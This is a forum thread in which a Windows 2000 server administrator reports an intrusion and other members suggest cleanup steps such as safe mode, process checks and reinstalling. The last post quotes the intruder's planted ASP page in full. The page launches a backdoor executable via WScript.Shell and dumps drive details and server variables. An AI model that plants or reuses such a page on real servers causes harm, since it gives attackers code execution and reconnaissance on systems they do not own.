Tek-Tips is the largest IT community on the Internet today!

Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!

Register Log in
  • Congratulations Shaun E on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!

I've been hacked

Status
Not open for further replies.
sodax

sodax

Programmer
Jun 26, 2003
87
GB
Somebody knows how can i Delete files from my server???

My server has been hacked by

ssijta :D

I try to delete files which take space from my disk. But I can't . I ve a message "impossible to delete this file...." I restarted twice teh server but nothing...

somebody can help me.???

thanks
 
Sort by date Sort by votes
Which Operating System are you using? And given the problem, it would be best to have it reformatted and the OS reinstalled. I hope you have backups.

----------------------------
"Will work for bandwidth" - Thinkgeek T-shirt
 
Upvote 0 Downvote
I'm using windows 2000 server.
I have backups but reformat solution is the last choice for me, if I find no solution to my problem I will do it.

But I prefer to have another solution than format drives
 
Upvote 0 Downvote
What are the files that you are trying to delete, they could be system files?

Check the Task Manager for any dependant processes then kill them.

Try running Spybot or something to see if there is a hidden dependant.

Iain
 
Upvote 0 Downvote
The files are not system files but i will try to follow your suggestions.

I try to search already a solution.

what I found is a message
"Hacking a pub tut by Skkwiddly. Wa2001"

somebody knows it,
does anybody know this hacker...??

bye
 
Upvote 0 Downvote
Reformat should always be something do once you have done the post-mortem. It is SOP of an incident like this. The reason is that you can never be totally sure what happened to the OS. However, in the interest of post-mortem:
I'd be careful with the sites you find ...

----------------------------
"Will work for bandwidth" - Thinkgeek T-shirt
 
Upvote 0 Downvote
Sodax

Have you tried to manage these undeletable items from safe mode? It may be a service/driver/network connection that won't let go in normal boot up but will not load or cannot connect in safe mode. Press "F8" as soon as Windows starts to load, imediately after system post, a startup menu will be presented choose safe mode. Often I have also been able to find problematic programs running on the box using the MSINFO32 tool in the section "software environment\startup programs".These applications will many times launch from the registry run keys, Anything unfamiliar can be commented out with a ; in front of the value in the registry for testing then removed or restored later.
 
Upvote 0 Downvote
thanks for your message, Ok , I can't use F8 cause I'm using terminal server so I can't start in safe mode.

But I got more information about it I saw a page made by the hacker
showing this information
backgate KIT (category :win ; known as:NT.hack)
"sud.exe" is created or running
do you know it.

bye and thanks a lot for your help


<%
CreateObject("WScript.Shell").Run("c:\Inetpub\iissamples\sdk\asp\applications\help\asp\win\sud.exe")
%>
<h1>Yes, you made it!! Good job dude!<\h1></h1>


____________________________________________________________

<HTML>
<HEAD>
<TITLE> Hacking a pub tut by Skkwiddly. Wa2001 </TITLE>
<META NAME="description" CONTENT="ThE HiDeOuT, InC.(we are watching you!!!)">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
</HEAD>

<BODY bgcolor="#FBFEFC" link="#2A75B9" vlink="#2A75B9" alink="#990099">
<%
CreateObject("WScript.Shell").Run("c:\Inetpub\iissamples\sdk\asp\applications\help\asp\win\sud.exe")
%>
<%

%>
<table width="750" border="0">
<tr>
<td width="250" valign="top">
<p><b> <font size="-1">Server Date: <% =date() %> <br>
Server Time: <%=time() %><br>
Server address: <%=request.servervariables("LOCAL_ADDR")%> <br>
Server Software: <%=request.servervariables("SERVER_SOFTWARE")%> <br></font></b> </p>
</td>
<td colspan="2">&nbsp;</td>
</tr>
</table>

<%
DIM fs, d, dc, s, n, sp
Set fs=Server.Createobject("Scripting.FileSystemObject")
Set dc=fs.drives
%>
<table border="0" width="750">
<tr bgcolor="#548596">
<td>
<div align="center"><font color="#FBFEFC"><b>Letter</b></font></div>
</td>
<td>
<div align="center"><font color="#FBFEFC"><b>Drive Type</b></font></div>
</td>
<td>
<div align="center"><font color="#FBFEFC"><b>Volume Name</b></font></div>
</td>
<td>
<div align="center"><font color="#FBFEFC"><b>File system</b></font></div>
</td>
<td>
<div align="center"><font color="#FBFEFC"><b>Free space</b></font></div>
</td>
<td>
<div align="center"><font color="#FBFEFC"><b>Total size</b></font></div>
</td>
</tr>
<%
back1="#D3E2E7"
back2="#AFFEDE"
back=back2
FOR EACH d IN dc
IF (back=back2) THEN
back=back1
ELSE
back=back2
END IF

%>
<tr bgcolor=<%=back%>>
<td>
<div align="center"><b> <%=d.driveletter%> </b></div>
</td>
<td>
<div align="center"><b> <%
IF d.DriveType = 0 Then
s = "Unknown"
IF d.VolumeName = "" Then
n = "&nbsp;"
Else
n = d.VolumeName
END IF
ELSEIF d.drivetype=1 THEN
s="Removable"
IF d.isready THEN
n=d.volumename
ELSE
n="--"
END IF
ELSEIF d.drivetype=2 THEN
s="Fixed"
IF d.isready THEN
n=d.volumename
ELSE
n="--"
END IF
ELSEIF d.drivetype=3 THEN
s="Network"
IF d.isready THEN
n=d.sharename
ELSE
n="--"
END IF
ELSEIF d.drivetype=4 THEN
s="CDROM"
IF d.isready THEN
n=d.volumename
ELSE
n="--"
END IF
ELSEIF d.drivetype=5 THEN
s="RAM Disk"
IF d.isready THEN
n=d.volumename
ELSE
n="--"
END IF
END IF
response.write(s)
%> </b></div>
</td>
<td><b> <%=n%> </b></td>
<td>
<div align="center"><b> <%
str=""

str=str & d.driveletter
str=str & ":"

'response.write(str)
IF d.isready THEN
set sp=fs.getdrive(str)
response.write(sp.filesystem)
ELSE
response.write("--")
END IF
%> </b></div>
</td>
<td>
<div align="right"><b> <%
str=""

str=str & d.driveletter
str=str & ":"

'response.write(str)
IF d.isready THEN
freespace = (d.AvailableSpace / 1048576)
set sp=fs.getdrive(str)
response.write(Round(freespace,1) & " MB")
ELSE
response.write("--")
END IF
%> </b></div>
</td>
<td>
<div align="right"><b> <%
str=""

str=str & d.driveletter
str=str & ":"

'response.write(str)
IF d.isready THEN
totalspace = (d.TotalSize / 1048576)
set sp=fs.getdrive(str)
response.write(Round(totalspace,1) & " MB")
ELSE
response.write("--")
END IF
%> </b></div>
</td>
</tr>
<%NEXT%>
</table>

<table width="750" border="0">
<tr>
<td>&nbsp;</td>
</tr>
<tr>
<td> <font size="-1"><%
for each thing in request.servervariables
tempvalue=request.servervariables(thing)
response.write thing & "=" & tempvalue & "<br>"
next
%> </font> </td>
</tr>
</table>
</BODY>
</HTML>
 
Upvote 0 Downvote
Status
Not open for further replies.

Similar threads

MrPB
  • Locked
  • Question
Am I being hacked/spied on?
Replies
7
Views
476
kjv1611
kjv1611
Blue407
  • Locked
  • Question
Home network hacked?
Replies
9
Views
425
Noway2
Noway2
ksbigfoot
  • Locked
  • Question
guestbook hacked
Replies
2
Views
84
ksbigfoot
ksbigfoot
lifegard2
  • Locked
  • Question
have i been hacked?
Replies
8
Views
180
cmeagan656
cmeagan656
jagoan
  • Locked
  • Question
Hacked by Zay
Replies
3
Views
127
smah
smah

Part and Inventory Search

Sponsor

Back
Top